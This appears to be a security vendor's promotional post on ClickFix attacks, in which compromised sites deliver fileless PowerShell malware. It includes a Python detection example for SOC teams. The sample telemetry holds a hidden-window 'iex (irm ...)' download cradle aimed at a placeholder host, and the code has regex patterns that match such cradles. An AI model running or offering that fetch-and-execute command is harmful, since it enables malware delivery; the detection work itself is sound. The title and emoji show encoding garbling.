๐Ÿšจ ๐—Ÿ๐—ฒ๐—ด๐—ถ๐˜๐—ถ๐—บ๐—ฎ๐˜๐—ฒ ๐—•๐Ÿฎ๐—• ๐—ช๐—ฒ๐—ฏ๐˜€๐—ถ๐˜๐—ฒ๐˜€ ๐—”๐—ฏ๐˜‚๐˜€๐—ฒ๐—ฑ ๐—ณ๐—ผ๐—ฟ ๐—™๐—ถ๐—น๐—ฒ๐—น๐—ฒ๐˜€๐˜€ ๐— ๐—ฎ๐—น๐˜„๐—ฎ๐—ฟ๐—ฒ ๐——๐—ฒ๐—น๐—ถ๐˜ƒ๐—ฒ๐—ฟ๐˜†: ๐——๐—ฒ๐˜๐—ฒ๐—ฐ๐˜ ๐—œ๐˜ ๐—˜๐—ฎ๐—ฟ๐—น๐˜†
Weโ€™re tracking widespread #ClickFix activity using compromised legitimate websites to deliver fileless malware, lowering suspicion and delaying detection.

โš ๏ธ Finance, banking, healthcare, manufacturing, and tech are among the most exposed industries.

โ—๏ธ The activity looks low-risk until fileless execution and outbound C2 traffic are already established. Attackers inject a lightweight inline JavaScript loader into compromised sites, which retrieves a second-stage payload directly into the victimโ€™s browser from external infrastructure.

The attack chain blends into normal web traffic, relies on PowerShell and in-memory execution, and later shifts C2 communication into the legitimate system process svchost.exe, making malicious activity harder to distinguish from routine system behavior for SOC and MSSP teams.

โšก๏ธ #ANYRUN Sandbox helps teams validate suspicious activity faster and contain fileless attacks before they escalate. Analysts can observe the full execution chain in real time:
Inline JS loader โžก๏ธ User-executed PowerShell (IEX/IRM) โžก๏ธ Hidden second-stage PowerShell and loader retrieval โžก๏ธ Fileless in-memory execution inside powershell.exe โžก๏ธ Follow-on .NET payload delivery โžก๏ธ svchost.exe injection โžก๏ธ Custom TCP C2 ๐Ÿšจ
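Two stages of the chain above leave telemetry a SOC can match on: the user-pasted PowerShell download cradle (IEX over IRM/IWR, usually with a hidden window and Explorer as parent) and svchost.exe opening outbound TCP to a port it has no business using. The following detection logic is an added example, not ANY.RUN's code; the events, the `/jsrepo?rnd=` host name and the "expected port" baseline are constructed assumptions to tune to your own environment.

```python
import re

# Constructed sample telemetry (not from the post): Sysmon-style process-creation
# and network-connection records as a SIEM pipeline might hand them over.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://loader.example.invalid/jsrepo?rnd=4242)"'},
    {"id": 2, "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
    {"id": 3, "type": "network", "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "203.0.113.7", "dst_port": 4444, "protocol": "tcp"},
    {"id": 4, "type": "network", "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "203.0.113.8", "dst_port": 443, "protocol": "tcp"},
]

# Download cradle: Invoke-Expression applied to the output of a web fetch.
CRADLE = re.compile(r"\b(?:iex|invoke-expression)\b.*"
                    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
# Hidden window or encoded command, typical of the pasted ClickFix one-liner.
STEALTH = re.compile(r"-(?:w|win|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\b", re.I)
# Parent that indicates a user-pasted command (Run dialog / Explorer), not a script host.
USER_LAUNCHERS = ("explorer.exe",)
# Ports svchost.exe normally talks to; an assumed baseline, replace with your own.
SVCHOST_EXPECTED_PORTS = {53, 80, 123, 443}

def classify_process(ev):
    """Return a finding for a ClickFix-style PowerShell cradle, else None."""
    if not ev["image"].lower().endswith("powershell.exe") or not CRADLE.search(ev["cmdline"]):
        return None
    # Escalate when the cradle is hidden and launched from a user-facing parent.
    score = 1 + bool(STEALTH.search(ev["cmdline"])) + ev["parent"].lower().endswith(USER_LAUNCHERS)
    return {"id": ev["id"], "severity": "high" if score >= 3 else "medium",
            "reason": "ClickFix-style PowerShell download cradle (IEX/IRM)"}

def classify_network(ev):
    """Return a finding for svchost.exe talking TCP to an unexpected port, else None."""
    if not ev["image"].lower().endswith("svchost.exe") or ev["protocol"] != "tcp":
        return None
    if ev["dst_port"] in SVCHOST_EXPECTED_PORTS:
        return None
    return {"id": ev["id"], "severity": "medium",
            "reason": f"svchost.exe outbound TCP to non-standard port {ev['dst_port']}"}

def triage(events):
    """Run both detectors over a batch of events and collect the findings."""
    findings = []
    for ev in events:
        f = classify_process(ev) if ev["type"] == "process" else classify_network(ev)
        if f:
            findings.append(f)
    return findings
```

Correlating the two findings on the same host within a short window is what separates this chain from an isolated odd svchost.exe connection, which is common enough on its own to need baselining.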

๐Ÿ‘จโ€๐Ÿ’ป Learn how #ANYRUN helps security teams detect complex threats and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoenterprise&utm_term=200526

📈 Scale your SOC with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: https://app.any.run/plans/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoplans&utm_term=200526

IOCs:

#cybersecurity #infosec